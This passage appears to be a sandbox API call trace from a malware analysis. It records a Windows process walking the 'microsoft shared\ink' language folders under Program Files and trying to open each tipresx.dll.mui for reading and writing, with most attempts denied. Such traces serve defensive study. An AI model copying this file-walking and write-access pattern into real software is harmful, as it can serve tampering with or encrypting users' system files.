hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.327] CloseHandle (hObject=0x428) returned 1 [0082.327] AreFileApisANSI () returned 1 [0082.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85a80 [0082.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85a80, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 73 [0082.327] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.327] GetLastError () returned 0x5 [0082.327] GetLastError () returned 0x5 [0082.327] SetLastError (dwErrCode=0x5) [0082.327] GetLastError () returned 0x5 [0082.327] SetLastError (dwErrCode=0x5) [0082.327] GetLastError () returned 0x5 [0082.327] SetLastError (dwErrCode=0x5) [0082.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85a80 | out: hHeap=0x20000) returned 1 [0082.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0082.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.327] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0082.327] FindClose (in: hFindFile=0x78610 | out: hFindFile=0x78610) returned 1 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0082.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0082.328] AreFileApisANSI () returned 1 [0082.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB", lpUsedDefaultChar=0x0) returned 57 [0082.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.329] AreFileApisANSI () returned 1 [0082.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 57 [0082.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.329] GetLastError () returned 0x5 [0082.329] GetLastError () returned 0x5 [0082.329] SetLastError (dwErrCode=0x5) [0082.329] GetLastError () returned 0x5 [0082.329] SetLastError (dwErrCode=0x5) [0082.329] GetLastError () returned 0x5 [0082.329] SetLastError (dwErrCode=0x5) [0082.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.329] AreFileApisANSI () returned 1 [0082.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 57 [0082.330] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.330] GetLastError () returned 0x5 [0082.330] GetLastError () returned 0x5 [0082.330] SetLastError (dwErrCode=0x5) [0082.330] GetLastError () returned 0x5 [0082.330] SetLastError (dwErrCode=0x5) [0082.330] GetLastError () returned 0x5 [0082.330] SetLastError (dwErrCode=0x5) [0082.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0082.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0082.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0082.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0082.330] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0082.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0082.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0082.330] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78690 [0082.330] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.331] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.331] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.332] AreFileApisANSI () returned 1 [0082.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0082.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.332] AreFileApisANSI () returned 1 [0082.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0082.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 73 [0082.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.333] GetFileType (hFile=0x428) returned 0x1 [0082.333] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0082.333] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.333] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.333] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.333] CloseHandle (hObject=0x428) returned 1 [0082.334] AreFileApisANSI () returned 1 [0082.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0082.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 73 [0082.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.334] GetLastError () returned 0x5 [0082.334] GetLastError () returned 0x5 [0082.334] SetLastError (dwErrCode=0x5) [0082.334] GetLastError () returned 0x5 [0082.334] SetLastError (dwErrCode=0x5) [0082.334] GetLastError () returned 0x5 [0082.334] SetLastError (dwErrCode=0x5) [0082.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0082.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0082.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.334] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓☀")) returned 0 [0082.334] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0082.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0082.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0082.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.335] AreFileApisANSI () returned 1 [0082.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", cchWideChar=-1, 